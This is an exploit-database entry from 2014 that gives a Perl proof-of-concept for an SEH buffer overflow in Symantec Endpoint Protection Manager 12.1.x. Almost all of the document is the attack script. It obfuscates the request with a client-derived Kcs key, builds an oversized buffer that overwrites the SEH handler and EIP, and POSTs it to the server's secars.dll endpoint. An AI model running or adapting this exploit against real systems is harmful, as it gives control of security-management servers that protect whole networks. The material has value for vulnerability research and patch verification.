Symantec Endpoint Protection Manager 12.1.x - SEH Overflow POC

27 Apr 2014 | Reported by st3n | Type: zdt | Source: 0day.today

Symantec Endpoint Protection Manager 12.1.x SEH overflow PoC. The code overwrites EIP with "CCCCCCCC". The key used to obfuscate traffic between client and server is generated during SEPM installation and must be found on a managed client station.

Code
use warnings;
use strict;
use IO::Socket::INET;
use SEPM::SEPM;
 
 
# SEP Manager host/ip
my $host        = "192.168.60.186";
my $port    = 8014;
 
# Kcs key
my $Kcs_hex     = "85FB05B288B45D92447A3EDCBEFC434E";
 
# ---- config end -----
 
 
 
 
# flush after every write
$| = 1;
 
 
# Send HTTP request function
sub send_request {
        my $param = shift;      # URL parameters
        my $post_data = shift;  # POST DATA
        my $sock = IO::Socket::INET->new("$host:$port");
        if($sock){
                print "Connected.. \n";
 
                # HTTP request
                my $req =
                        "POST /secars/secars.dll?h=$param HTTP/1.0\r\n" .
                        "User-Agent: Smc\r\n" .
                        "Host: $host\r\n" .
                        "Content-Length: " . length($post_data) . "\r\n" .
                        "\r\n" .
                        $post_data ;
 
                # Sending
                print $sock $req;
 
                # Read HTTP response
                my $resp = '';
                while(<$sock>){ $resp .=$_; }
 
                #print $resp;
                if($resp =~ /400 Bad Request/) {
                        print "\nERROR: Got '400 Bad Request' from the server. Wrong Kcs key ? Wrong SEP version ?\n";
                }
 
                close $sock;
        }
 
}
 
 
# SEP object
my $sep = SEPM::SEPM->new();
 
 
print "[*] Target: $host:$port\n";
print "[*] KCS Key: $Kcs_hex\n";
 
# SEPM object for obfuscation
print "[*] Generating master encryption key\n";
$sep->genkey($Kcs_hex);
 
# Obfuscate URL parameters 
print "[*] Encrypting URI\n";
my $h = $sep->obfuscate("l=9&action=26");
 
# The evil buff
print "[*] Building evil buffer\n";
my $buf =
        "foo=[hex]" .   # [hex] call the vulnerable parsing function
        "F" x 1288 .    # Junk
        "B" x 8 .       # Pointer to next SEH record
        "CCCCCCCC".     # SEH Handler, will overwrite EIP register
        "D" x 500;      # Trigger "Memory Access Violation" exception
 
 
# Sending request
print "[*] Sending HTTP request\n";
send_request($h,     # URL parameters
             $buf    # post data        
);
 
 
print "[*] Done\n";

